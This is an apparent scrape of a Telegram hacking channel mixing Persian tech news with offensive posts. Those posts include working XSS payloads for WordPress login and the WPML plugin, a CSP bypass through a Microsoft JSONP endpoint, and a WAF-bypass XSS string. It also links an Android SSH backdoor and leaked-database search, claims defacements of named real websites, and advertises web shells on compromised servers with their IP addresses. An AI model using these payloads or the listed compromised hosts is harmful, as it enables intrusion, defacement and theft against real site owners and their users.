wordpress login page allow un-auth cross site scripting (xss)
Payload :
#xss #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
%22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f#xss #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥14👎4⚡1👍1
Android backdoor
SSH Backdoor for android
Github
#android #backdoor
——————
0Day.Today
@LearnExploit
@Tech_Army
SSH Backdoor for android
Github
#android #backdoor
——————
0Day.Today
@LearnExploit
@Tech_Army
👎3👌2🤝2
LeakIX is a search engine for leaked databases and data leaks. It offers access to a large collection of databases, including usernames, passwords, email addresses, and more.
leakix.net
#osint #databreach
——————
0Day.Today
@LearnExploit
@Tech_Army
leakix.net
#osint #databreach
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9❤🔥1
You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year : octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5🤔2
WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability
Nuclei template: Github
Payload :
——————
0Day.Today
@LearnExploit
@Tech_Army
Nuclei template: Github
Payload :
https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c
#Wordpress #0day #xss——————
0Day.Today
@LearnExploit
@Tech_Army
👎4🔥3🤝1
در چند ساعت گذشته میلیون ها نفر از کاربران توییتر انیمیشن The Super Mario Bros را به طور رایگان و با کیفیتی بالا تماشا کردند.
یک کاربر توییتر با استفاده از قابلیت توییتر بلو (ارسال ویدیوهای طولانی بدون افت کیفیت) این فیلم را به طور کامل آپلود میکند که در نهایت و بعد از چندین ساعت توییتر این ویدیو را حذف میکند.
——————
0Day.Today
@LearnExploit
@Tech_Army
یک کاربر توییتر با استفاده از قابلیت توییتر بلو (ارسال ویدیوهای طولانی بدون افت کیفیت) این فیلم را به طور کامل آپلود میکند که در نهایت و بعد از چندین ساعت توییتر این ویدیو را حذف میکند.
——————
0Day.Today
@LearnExploit
@Tech_Army
❤5🫡1
مایکروسافت به صورت رسمی مشکل ساعت تابستانی ویندوز برای ایران را حل کرد
کاربران ویندوز 10 و 11 همین حالا با نصب آپدیتهای زیر میتوانند این مشکل را حل کنند و کاربران ویندوز Windows 7.0 SP1 تا Windows Server 2022 باید تا تاریخ سه شنبه، ۱۹ اردیبهشت، برای دریافت آپدیت صبر کنند.
میتونین از این زیر اونارو دانلود کنین :
Windows 11, version 22H2
Windows 11, version 21H2
Windows 10, version 22H2, 21H2, 20H2
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
کاربران ویندوز 10 و 11 همین حالا با نصب آپدیتهای زیر میتوانند این مشکل را حل کنند و کاربران ویندوز Windows 7.0 SP1 تا Windows Server 2022 باید تا تاریخ سه شنبه، ۱۹ اردیبهشت، برای دریافت آپدیت صبر کنند.
میتونین از این زیر اونارو دانلود کنین :
Windows 11, version 22H2
Windows 11, version 21H2
Windows 10, version 22H2, 21H2, 20H2
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4👍1
Site:
http://nagpursports.co.in
http://innovastore.cl
http://accessmedigap.com
http://medicarequotestoday.com
http://teach.medicareoffersnow.com
http://netf-lix.medicareoffersnow.com
http://test-05.followmylead.biz
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇨🇱 🇩🇪
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
http://nagpursports.co.in
http://innovastore.cl
http://accessmedigap.com
http://medicarequotestoday.com
http://teach.medicareoffersnow.com
http://netf-lix.medicareoffersnow.com
http://test-05.followmylead.biz
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇨🇱 🇩🇪
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
⚡1
PHP: 7.2.34
Safe Mode: OFF
ServerIP: 148.72.213.228 [🇸🇬]
Domains: 262 Domains
HDD: Total:199.99 GB
Free:9.18 GB [4%]
Useful : gcc cc ld make php perl python tar gzip nc
Downloader: wget lynx links curll wp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
Safe Mode: OFF
ServerIP: 148.72.213.228 [🇸🇬]
Domains: 262 Domains
HDD: Total:199.99 GB
Free:9.18 GB [4%]
Useful : gcc cc ld make php perl python tar gzip nc
Downloader: wget lynx links curll wp-mirror
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
🔥2👍1
از چه آنتی ویروسی استفاده میکنین ؟
و این که اگر بخواید به کسی واسه نصب پیشنهاد بدید کدوم رو پیشنهاد میدید ؟
و این که اگر بخواید به کسی واسه نصب پیشنهاد بدید کدوم رو پیشنهاد میدید ؟
Final Results
18%
bitdefender
3%
Norton
7%
McAfee
24%
Kaspersky
4%
avira
9%
Malwarebytes
36%
ESET
✍9🆒3👍1
WAF bypasses XSS payload in JSON Payload
#xss #waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
["');alert('XSS');//"]@xyz.xxx#xss #waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👌6⚡2👍2
This media is not supported in your browser
VIEW IN TELEGRAM
هوش مصنوعی بینگ به صورت عمومی در دسترس قرار گرفت
بعد از مدتها انتظار، مایکروسافت بلاخره امروز هوش مصنوعی بینگ را به صورت عمومی در دسترس تمامی کاربران قرار داد، حالا کاربران فقط با داشتن یه حساب کاربری مایکروسافت و مرورگر اج میتوانند از این هوش مصنوعی استفاده کنند.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
بعد از مدتها انتظار، مایکروسافت بلاخره امروز هوش مصنوعی بینگ را به صورت عمومی در دسترس تمامی کاربران قرار داد، حالا کاربران فقط با داشتن یه حساب کاربری مایکروسافت و مرورگر اج میتوانند از این هوش مصنوعی استفاده کنند.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥6
Site:
https://mffproject.com
http://slotpulsa.mffproject.com
http://test.mffproject.com
http://vfe-amzid.mffproject.com
http://vip.mffproject.com
http://wp.mffproject.com
https://aptic.club
https://aptic.club/wp-content
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇫🇷
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
https://mffproject.com
http://slotpulsa.mffproject.com
http://test.mffproject.com
http://vfe-amzid.mffproject.com
http://vip.mffproject.com
http://wp.mffproject.com
https://aptic.club
https://aptic.club/wp-content
Mirror-h:
https://mirror-h.org/search/hacker/59354/
Country: 🇺🇸 🇫🇷
#Deface
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
🔥4
CVE-2023-0386 - PoC Exploit Released for Linux Kernel Privilege Escalation
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4❤2
PHP: 7.3.33
Safe Mode: OFF
ServerIP: 92.205.4.113 [🇫🇷]
HDD: Total:2015.74 GB
Free:778.97 GB [38%]
Useful : gcc cc ld make php perl python ruby tar gzip
Downloader: wget lynx curl
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
Safe Mode: OFF
ServerIP: 92.205.4.113 [🇫🇷]
HDD: Total:2015.74 GB
Free:778.97 GB [38%]
Useful : gcc cc ld make php perl python ruby tar gzip
Downloader: wget lynx curl
Disable Functions: All Functions Accessible
CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON
SoftWare: Apache
🔗 Link
Enjoy... ⭐️
#Shell
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
⚡4❤🔥2👍1
یک ابزار برای Google Dorking خودکار با ChatGPT AI است که سرعت سرچ شمارو افزایش میده و به صورت رایگان در دسترس هست .
DorkSearch
#Dork #ChatGPT
iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army
DorkSearch
#Dork #ChatGPT
iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥7⚡1
☑️ تیک آبی به Gmail اضافه شد .
از این به بعد به شرکت های بزرگ و برندها تیک آبی تعلق میگیره .
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
از این به بعد به شرکت های بزرگ و برندها تیک آبی تعلق میگیره .
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
👍8😢2❤🔥1
Tiktok SSL Pinning Bypass
Bypass Tiktok SSL pinning on Android devices.
Github
#Tiktok #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Bypass Tiktok SSL pinning on Android devices.
Github
#Tiktok #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3